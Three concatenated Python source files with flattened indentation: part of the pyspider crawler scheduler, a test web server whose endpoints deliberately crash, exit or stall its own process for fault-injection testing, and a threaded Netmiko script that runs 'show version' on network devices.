logger.error('%s not in task: %.200r', each, task)
return False
if task['project'] not in self.projects:
logger.error('unknown project: %s', task['project'])
return False
project = self.projects[task['project']]
if not project.active:
logger.error('project %s not started, please set status to RUNNING or DEBUG',
task['project'])
return False
return True
def insert_task(self, task):
'''insert task into database'''
return self.taskdb.insert(task['project'], task['taskid'], task)
def update_task(self, task):
'''update task in database'''
return self.taskdb.update(task['project'], task['taskid'], task)
def put_task(self, task):
'''put task to task queue'''
_schedule = task.get('schedule', self.default_schedule)
self.projects[task['project']].task_queue.put(
task['taskid'],
priority=_schedule.get('priority', self.default_schedule['priority']),
exetime=_schedule.get('exetime', self.default_schedule['exetime'])
)
def send_task(self, task, force=True):
'''
dispatch task to fetcher
        the out queue may have a size limit to prevent blocking; a send_buffer is used as overflow
'''
try:
self.out_queue.put_nowait(task)
except Queue.Full:
if force:
self._send_buffer.appendleft(task)
else:
raise
def _check_task_done(self):
'''Check status queue'''
cnt = 0
try:
while True:
task = self.status_queue.get_nowait()
# check _on_get_info result here
if task.get('taskid') == '_on_get_info' and 'project' in task and 'track' in task:
if task['project'] not in self.projects:
continue
project = self.projects[task['project']]
project.on_get_info(task['track'].get('save') or {})
logger.info(
'%s on_get_info %r', task['project'], task['track'].get('save', {})
)
continue
elif not self.task_verify(task):
continue
self.on_task_status(task)
cnt += 1
except Queue.Empty:
pass
return cnt
merge_task_fields = ['taskid', 'project', 'url', 'status', 'schedule', 'lastcrawltime']
def _check_request(self):
'''Check new task queue'''
# check _postpone_request first
todo = []
for task in self._postpone_request:
if task['project'] not in self.projects:
continue
if self.projects[task['project']].task_queue.is_processing(task['taskid']):
todo.append(task)
else:
self.on_request(task)
self._postpone_request = todo
tasks = {}
while len(tasks) < self.LOOP_LIMIT:
try:
task = self.newtask_queue.get_nowait()
except Queue.Empty:
break
if isinstance(task, list):
_tasks = task
else:
_tasks = (task, )
for task in _tasks:
if not self.task_verify(task):
continue
if task['taskid'] in self.projects[task['project']].task_queue:
if not task.get('schedule', {}).get('force_update', False):
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
continue
if task['taskid'] in tasks:
if not task.get('schedule', {}).get('force_update', False):
continue
tasks[task['taskid']] = task
for task in itervalues(tasks):
self.on_request(task)
return len(tasks)
def _check_cronjob(self):
"""Check projects cronjob tick, return True when a new tick is sended"""
now = time.time()
self._last_tick = int(self._last_tick)
if now - self._last_tick < 1:
return False
self._last_tick += 1
for project in itervalues(self.projects):
if not project.active:
continue
if project.waiting_get_info:
continue
if int(project.min_tick) == 0:
continue
if self._last_tick % int(project.min_tick) != 0:
continue
self.on_select_task({
'taskid': '_on_cronjob',
'project': project.name,
'url': 'data:,_on_cronjob',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': {
'tick': self._last_tick,
},
},
'process': {
'callback': '_on_cronjob',
},
})
return True
request_task_fields = [
'taskid',
'project',
'url',
'status',
'schedule',
'fetch',
'process',
'track',
'lastcrawltime'
]
def _check_select(self):
'''Select task to fetch & process'''
while self._send_buffer:
_task = self._send_buffer.pop()
try:
                # use force=False so a full queue raises Queue.Full instead of silently re-appending to send_buffer
self.send_task(_task, False)
except Queue.Full:
self._send_buffer.append(_task)
break
if self.out_queue.full():
return {}
taskids = []
cnt = 0
cnt_dict = dict()
limit = self.LOOP_LIMIT
for project in itervalues(self.projects):
if not project.active:
continue
            # only check project pause when selecting new tasks; cronjobs and new requests keep working
if project.paused:
continue
if project.waiting_get_info:
continue
if cnt >= limit:
break
# task queue
task_queue = project.task_queue
task_queue.check_update()
project_cnt = 0
            # check send_buffer here: when it is not empty, out_queue may be blocked, so tasks should not be sent
while cnt < limit and project_cnt < limit / 10:
taskid = task_queue.get()
if not taskid:
break
taskids.append((project.name, taskid))
if taskid != 'on_finished':
project_cnt += 1
cnt += 1
cnt_dict[project.name] = project_cnt
if project_cnt:
project._selected_tasks = True
project._send_finished_event_wait = 0
# check and send finished event to project
if not project_cnt and len(task_queue) == 0 and project._selected_tasks:
# wait for self.FAIL_PAUSE_NUM steps to make sure all tasks in queue have been processed
if project._send_finished_event_wait < self.FAIL_PAUSE_NUM:
project._send_finished_event_wait += 1
else:
project._selected_tasks = False
project._send_finished_event_wait = 0
self._postpone_request.append({
'project': project.name,
'taskid': 'on_finished',
'url': 'data:,on_finished',
'process': {
'callback': 'on_finished',
},
"schedule": {
"age": 0,
"priority": 9,
"force_update": True,
},
})
for project, taskid in taskids:
self._load_put_task(project, taskid)
return cnt_dict
def _load_put_task(self, project, taskid):
try:
task = self.taskdb.get_task(project, taskid, fields=self.request_task_fields)
except ValueError:
logger.error('bad task pack %s:%s', project, taskid)
return
if not task:
return
task = self.on_select_task(task)
def _print_counter_log(self):
# print top 5 active counters
keywords = ('pending', 'success', 'retry', 'failed')
total_cnt = {}
project_actives = []
project_fails = []
for key in keywords:
total_cnt[key] = 0
for project, subcounter in iteritems(self._cnt['5m']):
actives = 0
for key in keywords:
cnt = subcounter.get(key, None)
if cnt:
cnt = cnt.sum
total_cnt[key] += cnt
actives += cnt
project_actives.append((actives, project))
fails = subcounter.get('failed', None)
if fails:
project_fails.append((fails.sum, project))
top_2_fails = sorted(project_fails, reverse=True)[:2]
top_3_actives = sorted([x for x in project_actives if x[1] not in top_2_fails],
reverse=True)[:5 - len(top_2_fails)]
log_str = ("in 5m: new:%(pending)d,success:%(success)d,"
"retry:%(retry)d,failed:%(failed)d" % total_cnt)
for _, project in itertools.chain(top_3_actives, top_2_fails):
subcounter = self._cnt['5m'][project].to_dict(get_value='sum')
log_str += " %s:%d,%d,%d,%d" % (project,
subcounter.get('pending', 0),
subcounter.get('success', 0),
subcounter.get('retry', 0),
subcounter.get('failed', 0))
logger.info(log_str)
def _dump_cnt(self):
'''Dump counters to file'''
self._cnt['1h'].dump(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].dump(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].dump(os.path.join(self.data_path, 'scheduler.all'))
def _try_dump_cnt(self):
'''Dump counters every 60 seconds'''
now = time.time()
if now - self._last_dump_cnt > 60:
self._last_dump_cnt = now
self._dump_cnt()
self._print_counter_log()
def _check_delete(self):
'''Check project delete'''
now = time.time()
for project in list(itervalues(self.projects)):
if project.db_status != 'STOP':
continue
if now - project.updatetime < self.DELETE_TIME:
continue
if 'delete' not in self.projectdb.split_group(project.group):
continue
logger.warning("deleting project: %s!", project.name)
del self.projects[project.name]
self.taskdb.drop(project.name)
self.projectdb.drop(project.name)
if self.resultdb:
self.resultdb.drop(project.name)
for each in self._cnt.values():
del each[project.name]
def __len__(self):
return sum(len(x.task_queue) for x in itervalues(self.projects))
def quit(self):
'''Set quit signal'''
self._quit = True
# stop xmlrpc server
if hasattr(self, 'xmlrpc_server'):
self.xmlrpc_ioloop.add_callback(self.xmlrpc_server.stop)
self.xmlrpc_ioloop.add_callback(self.xmlrpc_ioloop.stop)
def run_once(self):
        '''consume queues and feed tasks to fetcher, once'''
self._update_projects()
self._check_task_done()
self._check_request()
while self._check_cronjob():
pass
self._check_select()
self._check_delete()
self._try_dump_cnt()
def run(self):
'''Start scheduler loop'''
logger.info("scheduler starting...")
while not self._quit:
try:
time.sleep(self.LOOP_INTERVAL)
self.run_once()
self._exceptions = 0
except KeyboardInterrupt:
break
except Exception as e:
logger.exception(e)
self._exceptions += 1
if self._exceptions > self.EXCEPTION_LIMIT:
break
continue
logger.info("scheduler exiting...")
self._dump_cnt()
def trigger_on_start(self, project):
'''trigger an on_start callback of project'''
self.newtask_queue.put({
"project": project,
"taskid": "on_start",
"url": "data:,on_start",
"process": {
"callback": "on_start",
},
})
def xmlrpc_run(self, port=23333, bind='127.0.0.1', logRequests=False):
'''Start xmlrpc interface'''
from pyspider.libs.wsgi_xmlrpc import WSGIXMLRPCApplication
application = WSGIXMLRPCApplication()
application.register_function(self.quit, '_quit')
application.register_function(self.__len__, 'size')
def dump_counter(_time, _type):
try:
return self._cnt[_time].to_dict(_type)
except:
logger.exception('')
application.register_function(dump_counter, 'counter')
def new_task(task):
if self.task_verify(task):
self.newtask_queue.put(task)
return True
return False
application.register_function(new_task, 'newtask')
def send_task(task):
'''dispatch task to fetcher'''
self.send_task(task)
return True
application.register_function(send_task, 'send_task')
def update_project():
self._force_update_project = True
application.register_function(update_project, 'update_project')
def get_active_tasks(project=None, limit=100):
allowed_keys = set((
'type',
'taskid',
'project',
'status',
'url',
'lastcrawltime',
'updatetime',
'track',
))
track_allowed_keys = set((
'ok',
'time',
'follows',
'status_code',
))
iters = [iter(x.active_tasks) for k, x in iteritems(self.projects)
if x and (k == project if project else True)]
tasks = [next(x, None) for x in iters]
result = []
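            # k-way merge across the per-project active_tasks deques: repeatedly take the newest entry (largest updatetime)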
while len(result) < limit and tasks and not all(x is None for x in tasks):
updatetime, task = t = max(t for t in tasks if t)
i = tasks.index(t)
tasks[i] = next(iters[i], None)
for key in list(task):
if key == 'track':
for k in list(task[key].get('fetch', [])):
if k not in track_allowed_keys:
del task[key]['fetch'][k]
for k in list(task[key].get('process', [])):
if k not in track_allowed_keys:
del task[key]['process'][k]
if key in allowed_keys:
continue
del task[key]
result.append(t)
# fix for "<type 'exceptions.TypeError'>:dictionary key must be string"
# have no idea why
return json.loads(json.dumps(result))
application.register_function(get_active_tasks, 'get_active_tasks')
def get_projects_pause_status():
result = {}
for project_name, project in iteritems(self.projects):
result[project_name] = project.paused
return result
application.register_function(get_projects_pause_status, 'get_projects_pause_status')
def webui_update():
return {
'pause_status': get_projects_pause_status(),
'counter': {
'5m_time': dump_counter('5m_time', 'avg'),
'5m': dump_counter('5m', 'sum'),
'1h': dump_counter('1h', 'sum'),
'1d': dump_counter('1d', 'sum'),
'all': dump_counter('all', 'sum'),
},
}
application.register_function(webui_update, 'webui_update')
import tornado.wsgi
import tornado.ioloop
import tornado.httpserver
container = tornado.wsgi.WSGIContainer(application)
self.xmlrpc_ioloop = tornado.ioloop.IOLoop()
self.xmlrpc_server = tornado.httpserver.HTTPServer(container, io_loop=self.xmlrpc_ioloop)
self.xmlrpc_server.listen(port=port, address=bind)
logger.info('scheduler.xmlrpc listening on %s:%s', bind, port)
self.xmlrpc_ioloop.start()
def on_request(self, task):
if self.INQUEUE_LIMIT and len(self.projects[task['project']].task_queue) >= self.INQUEUE_LIMIT:
logger.debug('overflow task %(project)s:%(taskid)s %(url)s', task)
return
oldtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.merge_task_fields)
if oldtask:
return self.on_old_request(task, oldtask)
else:
return self.on_new_request(task)
def on_new_request(self, task):
'''Called when a new request is arrived'''
task['status'] = self.taskdb.ACTIVE
self.insert_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
self._cnt['all'].event((project, 'pending'), +1)
logger.info('new task %(project)s:%(taskid)s %(url)s', task)
return task
def on_old_request(self, task, old_task):
'''Called when a crawled task is arrived'''
now = time.time()
_schedule = task.get('schedule', self.default_schedule)
old_schedule = old_task.get('schedule', {})
if _schedule.get('force_update') and self.projects[task['project']].task_queue.is_processing(task['taskid']):
            # while a task is being processed, modifying it may conflict with the running task,
            # so postpone the modification until the task finishes.
logger.info('postpone modify task %(project)s:%(taskid)s %(url)s', task)
self._postpone_request.append(task)
return
restart = False
schedule_age = _schedule.get('age', self.default_schedule['age'])
if _schedule.get('itag') and _schedule['itag'] != old_schedule.get('itag'):
restart = True
elif schedule_age >= 0 and schedule_age + (old_task.get('lastcrawltime', 0) or 0) < now:
restart = True
elif _schedule.get('force_update'):
restart = True
if not restart:
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
return
if _schedule.get('cancel'):
logger.info('cancel task %(project)s:%(taskid)s %(url)s', task)
task['status'] = self.taskdb.BAD
self.update_task(task)
self.projects[task['project']].task_queue.delete(task['taskid'])
return task
task['status'] = self.taskdb.ACTIVE
self.update_task(task)
self.put_task(task)
project = task['project']
if old_task['status'] != self.taskdb.ACTIVE:
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
if old_task['status'] == self.taskdb.SUCCESS:
self._cnt['all'].event((project, 'success'), -1).event((project, 'pending'), +1)
elif old_task['status'] == self.taskdb.FAILED:
self._cnt['all'].event((project, 'failed'), -1).event((project, 'pending'), +1)
logger.info('restart task %(project)s:%(taskid)s %(url)s', task)
return task
def on_task_status(self, task):
'''Called when a status pack is arrived'''
try:
procesok = task['track']['process']['ok']
if not self.projects[task['project']].task_queue.done(task['taskid']):
logging.error('not processing pack: %(project)s:%(taskid)s %(url)s', task)
return None
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def on_task_done(self, task):
'''Called when a task is done and success, called by `on_task_status`'''
task['status'] = self.taskdb.SUCCESS
task['lastcrawltime'] = time.time()
if 'schedule' in task:
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
task['status'] = self.taskdb.ACTIVE
next_exetime = task['schedule'].get('age')
task['schedule']['exetime'] = time.time() + next_exetime
self.put_task(task)
else:
del task['schedule']
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'success'), +1)
self._cnt['1h'].event((project, 'success'), +1)
self._cnt['1d'].event((project, 'success'), +1)
self._cnt['all'].event((project, 'success'), +1).event((project, 'pending'), -1)
logger.info('task done %(project)s:%(taskid)s %(url)s', task)
return task
def on_task_failed(self, task):
'''Called when a task is failed, called by `on_task_status`'''
if 'schedule' not in task:
old_task = self.taskdb.get_task(task['project'], task['taskid'], fields=['schedule'])
if old_task is None:
logging.error('unknown status pack: %s' % task)
return
task['schedule'] = old_task.get('schedule', {})
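        # pick the next execution delay from the project's retry_delay table (keyed by retry count, '' is the fallback)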
retries = task['schedule'].get('retries', self.default_schedule['retries'])
retried = task['schedule'].get('retried', 0)
project_info = self.projects[task['project']]
retry_delay = project_info.retry_delay or self.DEFAULT_RETRY_DELAY
next_exetime = retry_delay.get(retried, retry_delay.get('', self.DEFAULT_RETRY_DELAY['']))
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
next_exetime = min(next_exetime, task['schedule'].get('age'))
else:
if retried >= retries:
next_exetime = -1
elif 'age' in task['schedule'] and next_exetime > task['schedule'].get('age'):
next_exetime = task['schedule'].get('age')
if next_exetime < 0:
task['status'] = self.taskdb.FAILED
task['lastcrawltime'] = time.time()
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'failed'), +1)
self._cnt['1h'].event((project, 'failed'), +1)
self._cnt['1d'].event((project, 'failed'), +1)
self._cnt['all'].event((project, 'failed'), +1).event((project, 'pending'), -1)
logger.info('task failed %(project)s:%(taskid)s %(url)s' % task)
return task
else:
task['schedule']['retried'] = retried + 1
task['schedule']['exetime'] = time.time() + next_exetime
task['lastcrawltime'] = time.time()
self.update_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'retry'), +1)
self._cnt['1h'].event((project, 'retry'), +1)
self._cnt['1d'].event((project, 'retry'), +1)
# self._cnt['all'].event((project, 'retry'), +1)
logger.info('task retry %d/%d %%(project)s:%%(taskid)s %%(url)s' % (
retried, retries), task)
return task
def on_select_task(self, task):
'''Called when a task is selected to fetch & process'''
        # inject information about the project
logger.info('select %(project)s:%(taskid)s %(url)s', task)
project_info = self.projects.get(task['project'])
assert project_info, 'no such project'
task['type'] = self.TASK_PACK
task['group'] = project_info.group
task['project_md5sum'] = project_info.md5sum
task['project_updatetime'] = project_info.updatetime
# lazy join project.crawl_config
if getattr(project_info, 'crawl_config', None):
task = BaseHandler.task_join_crawl_config(task, project_info.crawl_config)
project_info.active_tasks.appendleft((time.time(), task))
self.send_task(task)
return task
from tornado import gen
class OneScheduler(Scheduler):
"""
Scheduler Mixin class for one mode
    overrides the send_task method
call processor.on_task(fetcher.fetch(task)) instead of consuming queue
"""
def _check_select(self):
"""
interactive mode of select tasks
"""
if not self.interactive:
return super(OneScheduler, self)._check_select()
# waiting for running tasks
if self.running_task > 0:
return
is_crawled = []
def run(project=None):
return crawl('on_start', project=project)
def crawl(url, project=None, **kwargs):
"""
Crawl given url, same parameters as BaseHandler.crawl
url - url or taskid, parameters will be used if in taskdb
project - can be ignored if only one project exists.
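            Example (illustrative): crawl('http://example.com/', project='my_project')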
"""
# looking up the project instance
if project is None:
if len(self.projects) == 1:
project = list(self.projects.keys())[0]
else:
                    raise LookupError('You need to specify the project: %r'
% list(self.projects.keys()))
project_data = self.processor.project_manager.get(project)
if not project_data:
raise LookupError('no such project: %s' % project)
# get task package
instance = project_data['instance']
instance._reset()
task = instance.crawl(url, **kwargs)
if isinstance(task, list):
raise Exception('url list is not allowed in interactive mode')
# check task in taskdb
if not kwargs:
dbtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.request_task_fields)
if not dbtask:
dbtask = self.taskdb.get_task(task['project'], task['url'],
fields=self.request_task_fields)
if dbtask:
task = dbtask
# select the task
self.on_select_task(task)
is_crawled.append(True)
shell.ask_exit()
def quit_interactive():
'''Quit interactive mode'''
is_crawled.append(True)
self.interactive = False
shell.ask_exit()
def quit_pyspider():
'''Close pyspider'''
is_crawled[:] = []
shell.ask_exit()
shell = utils.get_python_console()
banner = (
'pyspider shell - Select task\n'
'crawl(url, project=None, **kwargs) - same parameters as BaseHandler.crawl\n'
'quit_interactive() - Quit interactive mode\n'
'quit_pyspider() - Close pyspider'
)
if hasattr(shell, 'show_banner'):
shell.show_banner(banner)
shell.interact()
else:
shell.interact(banner)
if not is_crawled:
self.ioloop.add_callback(self.ioloop.stop)
def __getattr__(self, name):
"""patch for crawl(url, callback=self.index_page) API"""
if self.interactive:
return name
raise AttributeError(name)
def on_task_status(self, task):
"""Ignore not processing error in interactive mode"""
if not self.interactive:
super(OneScheduler, self).on_task_status(task)
try:
procesok = task['track']['process']['ok']
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def init_one(self, ioloop, fetcher, processor,
result_worker=None, interactive=False):
self.ioloop = ioloop
self.fetcher = fetcher
self.processor = processor
self.result_worker = result_worker
self.interactive = interactive
self.running_task = 0
@gen.coroutine
def do_task(self, task):
self.running_task += 1
result = yield gen.Task(self.fetcher.fetch, task)
type, task, response = result.args
self.processor.on_task(task, response)
# do with message
while not self.processor.inqueue.empty():
_task, _response = self.processor.inqueue.get()
self.processor.on_task(_task, _response)
# do with results
while not self.processor.result_queue.empty():
_task, _result = self.processor.result_queue.get()
if self.result_worker:
self.result_worker.on_result(_task, _result)
self.running_task -= 1
def send_task(self, task, force=True):
if self.fetcher.http_client.free_size() <= 0:
if force:
self._send_buffer.appendleft(task)
else:
                raise Queue.Full
self.ioloop.add_future(self.do_task(task), lambda x: x.result())
def run(self):
import tornado.ioloop
tornado.ioloop.PeriodicCallback(self.run_once, 100,
io_loop=self.ioloop).start()
self.ioloop.start()
def quit(self):
self.ioloop.stop()
logger.info("scheduler exiting...")
import random
import threading
from pyspider.database.sqlite.sqlitebase import SQLiteMixin
class ThreadBaseScheduler(Scheduler):
def __init__(self, threads=4, *args, **kwargs):
self.local = threading.local()
super(ThreadBaseScheduler, self).__init__(*args, **kwargs)
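        # SQLite does not cope well with concurrent access from multiple threads, so fall back to a single worker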
if isinstance(self.taskdb, SQLiteMixin):
self.threads = 1
else:
self.threads = threads
self._taskdb = self.taskdb
self._projectdb = self.projectdb
self._resultdb = self.resultdb
self.thread_objs = []
self.thread_queues = []
self._start_threads()
assert len(self.thread_queues) > 0
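    # each worker thread lazily gets its own copy of the database connections via these thread-local properties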
@property
def taskdb(self):
if not hasattr(self.local, 'taskdb'):
self.taskdb = self._taskdb.copy()
return self.local.taskdb
@taskdb.setter
def taskdb(self, taskdb):
self.local.taskdb = taskdb
@property
def projectdb(self):
if not hasattr(self.local, 'projectdb'):
self.projectdb = self._projectdb.copy()
return self.local.projectdb
@projectdb.setter
def projectdb(self, projectdb):
self.local.projectdb = projectdb
@property
def resultdb(self):
if not hasattr(self.local, 'resultdb'):
self.resultdb = self._resultdb.copy()
return self.local.resultdb
@resultdb.setter
def resultdb(self, resultdb):
self.local.resultdb = resultdb
def _start_threads(self):
for i in range(self.threads):
queue = Queue.Queue()
thread = threading.Thread(target=self._thread_worker, args=(queue, ))
thread.daemon = True
thread.start()
self.thread_objs.append(thread)
self.thread_queues.append(queue)
def _thread_worker(self, queue):
while True:
method, args, kwargs = queue.get()
try:
method(*args, **kwargs)
except Exception as e:
logger.exception(e)
def _run_in_thread(self, method, *args, **kwargs):
i = kwargs.pop('_i', None)
block = kwargs.pop('_block', False)
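        # when _i is given, work for the same key (e.g. a taskid hash) is pinned to one queue, preserving per-task ordering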
if i is None:
while True:
for queue in self.thread_queues:
if queue.empty():
break
else:
if block:
time.sleep(0.1)
continue
else:
queue = self.thread_queues[random.randint(0, len(self.thread_queues)-1)]
break
else:
queue = self.thread_queues[i % len(self.thread_queues)]
queue.put((method, args, kwargs))
if block:
self._wait_thread()
def _wait_thread(self):
while True:
if all(queue.empty() for queue in self.thread_queues):
break
time.sleep(0.1)
def _update_project(self, project):
self._run_in_thread(Scheduler._update_project, self, project)
def on_task_status(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_task_status, self, task, _i=i)
def on_request(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_request, self, task, _i=i)
def _load_put_task(self, project, taskid):
i = hash(taskid)
self._run_in_thread(Scheduler._load_put_task, self, project, taskid, _i=i)
def run_once(self):
super(ThreadBaseScheduler, self).run_once()
self._wait_thread()
|
FunkyWebServer.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import *
from builtins import object
from future.utils import PY2
__author__ = 'matth'
import http.server
import socketserver
import urllib.parse
import argparse
from processfamily.test import Config
import logging
import logging.handlers
import threading
import _thread
import os
from types import CodeType
import json
import sys
import ctypes
from processfamily import _traceback_str
import select
import errno
import socket
if sys.platform.startswith('win'):
import win32job
import win32api
else:
from .. import ctypes_prctl as prctl
def crash():
"""
crash the Python interpreter...
see https://wiki.python.org/moin/CrashingPython
"""
exec(CodeType(0, 5, 8, 0, "hello moshe", (), (), (), "", "", 0, ""))
if sys.platform.startswith('win'):
#Using a PyDLL here instead of a WinDLL causes the GIL to be acquired:
_kernel32 = ctypes.PyDLL('kernel32.dll')
def hold_gil(timeout):
try:
logging.info("Stealing GIL for %ss", timeout)
_kernel32.Sleep(timeout*1000)
logging.info("Released GIL")
except ValueError as e:
#This happens because it does some sneaky checking of things at the end of the
            #function call and notices that it has been tricked into using the wrong calling convention
#(because we are using PyDLL instead of WinDLL)
#See http://python.net/crew/theller/ctypes/tutorial.html#calling-functions
pass
else:
_libc = ctypes.PyDLL('libc.so.6')
def hold_gil(timeout):
#Using a PyDLL here instead of a CDLL causes the GIL to be acquired:
logging.info("Stealing GIL for %ss", timeout)
_libc.sleep(timeout)
logging.info("Released GIL")
class MyHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
funkyserver = None
http_server = None
def do_GET(self):
"""Serve a GET request."""
parsed_url = urllib.parse.urlparse(self.path)
params = urllib.parse.parse_qs(parsed_url.query)
path = parsed_url.path
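        # dispatch on the request path: /stop, /crash, /interrupt_main, /exit and /hold_gil are test hooks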
if path.startswith('/stop'):
# stop children before we return a response
timeout = int((params.get("timeout", []) or ["30"])[0])
self.funkyserver.pre_stop(timeout=timeout)
t = self.get_response_text()
if self.send_head(t):
self.wfile.write(t)
#I preempt the finish operation here so that processing of this request is all done before we crash or whatever:
self.finish()
self.http_server.shutdown_request(self.connection)
if path.startswith('/crash'):
crash()
if path.startswith('/stop'):
self.funkyserver.stop()
if path.startswith('/interrupt_main'):
_thread.interrupt_main()
if path.startswith('/exit'):
os._exit(1)
if path.startswith('/hold_gil'):
t = int((params.get("t", []) or ["100"])[0])
hold_gil(t)
def do_HEAD(self):
"""Serve a HEAD request."""
self.send_head(self.get_response_text())
def get_response_text(self):
return self._to_json_rsp(self.get_response_object())
def get_response_object(self):
if self.path.startswith('/injob'):
return json.dumps(win32job.IsProcessInJob(win32api.GetCurrentProcess(), None), indent=3)
if self.path.startswith('/job'):
extended_info = win32job.QueryInformationJobObject(None, win32job.JobObjectExtendedLimitInformation)
return json.dumps(extended_info, indent=3)
if self.path.startswith('/close_file_and_delete_it'):
try:
if self.funkyserver._open_file_handle is not None:
f = os.path.join(os.path.dirname(__file__), 'tmp', 'testfile.txt')
logging.info("Closing test file handle")
self.funkyserver._open_file_handle.close()
self.funkyserver._open_file_handle = None
assert os.path.exists(f)
os.remove(f)
assert not os.path.exists(f)
return "OK"
except Exception as e:
logging.error("Failed to close file handle and delete file: %s\n%s", e, _traceback_str())
return "FAIL"
if self.path.startswith('/stop'):
logging.info("Returning child_processes_terminated: %r", self.funkyserver.child_processes_terminated)
return repr(self.funkyserver.child_processes_terminated)
return "OK"
def _to_json_rsp(self, o):
return json.dumps(o, indent=3).encode('utf-8')
def send_head(self, content):
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
"""
if self.path.lower().startswith('/favicon'):
self.send_error(404, "File not found")
return False
self.send_response(200)
self.send_header("Content-type", "application/json; charset=utf-8")
self.send_header("Connection", "close")
self.end_headers()
return True
def log_message(self, format, *args):
"""Log an arbitrary message.
This is used by all other logging functions. Override
it if you have specific logging wishes.
The first argument, FORMAT, is a format string for the
message to be logged. If the format string contains
any % escapes requiring parameters, they should be
specified as subsequent arguments (it's just like
printf!).
The client ip address and current date/time are prefixed to every
message.
"""
logging.info("%s - - " + format, self.client_address[0], *args)
class MyHTTPServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
def __init__(self, port):
MyHTTPRequestHandler.http_server = self
http.server.HTTPServer.__init__(self, ("", port), MyHTTPRequestHandler)
def handle_error(self, request, client_address):
logging.error('Exception happened during processing of request from %s:\n%s', client_address, _traceback_str())
class FunkyWebServer(object):
_open_file_handle = None
def __init__(self):
self.parse_args_and_setup_logging()
self.port = Config.get_starting_port_nr() + self.process_number
MyHTTPRequestHandler.funkyserver = self
self.httpd_lock = threading.RLock()
self.httpd = None
self.child_processes_terminated = None
@classmethod
def parse_args_and_setup_logging(cls):
arg_parser = argparse.ArgumentParser(description='FunkyWebServer')
arg_parser.add_argument('--process_number', type=int)
arg_parser.add_argument('--num_children', type=int)
args = arg_parser.parse_args()
cls.process_number = args.process_number or 0
logsdir = os.path.join(os.path.dirname(__file__), 'tmp', 'logs')
if not os.path.exists(logsdir):
os.makedirs(logsdir)
logFormatter = logging.Formatter('%(asctime)s %(message)s')
loghandler = logging.handlers.TimedRotatingFileHandler(os.path.join(logsdir, "process-%02d-log.txt" % cls.process_number), when="midnight")
loghandler.setFormatter(logFormatter)
logger = logging.getLogger()
logger.addHandler(loghandler)
if not sys.platform.startswith('win'):
if cls.process_number > 0:
prctl.set_name(b'python-pfchild')
else:
prctl.set_name(b'python-pfparent')
cls.num_children = args.num_children or 3
if cls._open_file_handle is None and cls.process_number == 0:
logging.info("Opening a file and keeping it open")
cls._open_file_handle = open(os.path.join(os.path.dirname(__file__), 'tmp', 'testfile.txt'), 'w')
# The tests expect file descriptors to be inheritable, but from Python 3.4 onwards, file descriptors
# are set to be not inheritable by default.
if not PY2:
os.set_inheritable(cls._open_file_handle.fileno(), True)
def run(self):
with self.httpd_lock:
self.httpd = MyHTTPServer(self.port)
logging.info("Process %d listening on port %d", self.process_number, self.port)
self.httpd.serve_forever(poll_interval=0.1)
logging.info("Process %d finished listening on port %d", self.process_number, self.port)
def pre_stop(self, timeout=30):
try:
if hasattr(self, 'family'):
logging.info("Stopping family...")
self.child_processes_terminated = terminated = self.family.stop(timeout=timeout)
if terminated:
logging.info("Had to terminate %d child processes", terminated)
else:
logging.info("Didn't have to terminate child processes, they stopped gracefully")
except Exception as e:
self.child_processes_terminated = e
logging.error("Error terminating child processes: %r", e)
def stop(self):
with self.httpd_lock:
if self.httpd:
logging.info("Shutting down httpd (in separate thread)")
threading.Thread(name="shutdown", target=self.shutdown_httpd).start()
def shutdown_httpd(self):
try:
with self.httpd_lock:
logging.info("Shutting down httpd")
self.httpd.shutdown()
logging.info("Shut down httpd")
self.httpd = None
finally:
if self._open_file_handle is not None:
logging.info("Closing test file handle")
self._open_file_handle.close()
|
threads_netmiko.py | #!/usr/bin/env python
import threading
from datetime import datetime
from netmiko import ConnectHandler
from my_devices import device_list as devices
def show_version(a_device):
"""Execute show version command using Netmiko."""
remote_conn = ConnectHandler(**a_device)
print()
print("#" * 80)
print(remote_conn.send_command_expect("show version"))
print("#" * 80)
print()
def main():
"""
Use threads and Netmiko to connect to each of the devices. Execute
'show version' on each device. Record the amount of time required to do this.
"""
start_time = datetime.now()
for a_device in devices:
my_thread = threading.Thread(target=show_version, args=(a_device,))
my_thread.start()
    main_thread = threading.current_thread()
for some_thread in threading.enumerate():
if some_thread != main_thread:
print(some_thread)
some_thread.join()
print("\nElapsed time: " + str(datetime.now() - start_time))
